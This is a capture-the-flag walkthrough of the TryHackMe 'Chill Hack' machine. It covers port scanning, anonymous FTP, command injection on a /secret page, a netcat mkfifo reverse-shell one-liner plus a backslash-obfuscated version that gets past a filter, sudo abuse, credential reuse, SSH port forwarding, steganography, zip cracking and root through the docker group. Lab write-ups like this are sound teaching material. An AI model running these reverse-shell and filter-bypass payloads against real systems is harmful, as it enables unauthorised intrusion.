TryHackMe: Chill Hack

Initial foothold

  1. Port scan
nmap -Pn <target ip>nmap -Pn -p1000- <target ip>

There’re 3 open ports: 21, 22 and 80.

2. OS and service scan

nmap -A -p21,22,80 <target ip>

The OS is Ubuntu.

There’re 3 services:

  • 21/tcp open ftp vsftpd 3.0.3 w/ anonymous login
  • 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux;
  • 80/tcp open http Apache httpd 2.4.29 ((Ubuntu))

3. Vuln scan

nmap --script vuln -p21,22,80 <target ip>

There’re discovered directotories on HTTP service:

/csss/images//js//secret/

Service Enumeration

  1. FTP on port 21 w/ anonymous login

Connect and download the file.

ftp <target ip>username: anonymousls -laget note.txt

Read the file

cat note.txt

There’re possible username, save them as users.txt. Another thing is, in some service, there may be some implemented filter.

2. SSH on port 22

Test the connection

ssh <target ip>

I can connect successfully.

3. HTTP on port 80

nikto scan

nikto -h http://<target ip>/

There’re discovered directory as same as vuln scan result.

Directory scan w/ gobuster

gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://<target ip>/ -x php,txt,html,sh,cgi,bak -q

Access the site

I accessed every pages untial I came across this directory, /secret .

Exploitation

  1. Test the Comand function
  • Ping command

At the attacker machince

tcpdump ip proto \\icmp -i tun0

At the target machine, test the ping command\

ping -c 10 <attacker ip>

Back to the attacker machine. The command injection worked as expected.

  • Reverse shell

Create listener on port 443

rlwrap nc -lvp 443

Inject the reverse shell command

I will use this command.

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attacker ip> 443 >/tmp/f

I encountered w/ the filter as hinted in note.txt from FTP service.

Bypass the filter, I will use ‘\’ as the starting charactor.

r\m /t\m\p/f;m\k\f\i\f\o /t\m\p/f;c\a\t /t\m\p/f|/b\i\n/s\h -i 2>&1|n\c <attcker ip> 443 >/t\m\p/f

Back to listener, now I got the shell

Privilege Escalation

  1. Get TTY shell
which python

The machine doesn't have python command.

Maybe this machine has python3

which python3python3 -c 'import pty;pty.spawn("/bin/bash");'

Now I have TTY shell and current directory is /var/www/html/secret.

2. Explore directories

I came across another HTTP site’s directories in “/var/www”

I think it’s a hidden HTTP site and can be accessible by only this machine.

cat /var/www/files/index.php | less

I got MySQL credential.

Try to login as root, in case there’s re-using password.

su rootpassword: !@m+her00+@db

Failed!!!

3. Verify sudo

sudo -l

Use command

sudo /home/apaar/.helpline.sh

Failed!!!

Use command as apaar

sudo -u apaar /home/apaar/.helpline.sh

Trying to get shell by supplying /bin/bash

/bin/bashwhoami

Now I escalated to be apaar.

Verify sudo again

sudo -l

It’s the same command as www-data. If I supply /bin/bash as www-data, I still be apaar anyway.

Read user.txt

cd /home/apaarls -lacat local.txt

Now I got the first flag.

4. Login to mysql

mysql -uroot '-p!@m+her00+@db'
show databases;

There’s webportal schema.

Get webportal’s tables.

use webportal;show tables; -> usersselect * from users;

I got credential of anurodh and apaar,

Crack hashes w/ crackstation

Try re-using password

su aurickpassword: masterpasswordsu anurodhpassword: masterpasswordsu apaarpassword: dontaskdonttell

All failed!!!

5. Searching for hidden port and service

Since there’s hidden website stored in /var/www/files/. My suspicion is this machine may have hidden port.

Verify port

ss -tunpl

As suspected, there’s port no.9001.

HTTP can be configured to use different port instead of 80. The configuration is located in:

/etc/apache2/sites-enabled/

Verify

cd /etc/apache2/sites-enabled/ls -la
cat 000-default.conf

6. Port-forwarding

Back to attacker machine, start ssh service

systemctl start ssh.socketsystemctl status ssh.socket

At the target machine, forward the port

ssh -R 9001:127.0.0.1:9001 <attacker user>@<attacker ip>

Access the site via attack machine

http://localhost:9001

Login w/ cracked credential from MySQL

username: Aurickpassword: masterpassword

As hinted, I downloaded the image.

7. Steganography

Read file metadata

exiftool <filename>

Not much revealed

Extract hidden file w/ steghide

steghide extract -sf ./<file> 

I have backup.zip

Unzip

unzip backup.zip

I need password.

Find the password w/ fcrackzip

fcrackzip   -u -v -D -p rockyou.txt backup.zip

Unzip again and supply the password. Now I got source_code.php

cat source_code.php

There’s base64 string.

Decode w/ cyberchef

Try to login as anurodh

su anurodhpassword: !d0ntKn0wmYp@ssw0rd

Verify user

id

I’m part of docker.

Exploit docker

docker run -v /:/mnt --rm -it alpine chroot /mnt shwhoami

Now I’m root.

cd /rootls -la
cat proof.txt

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store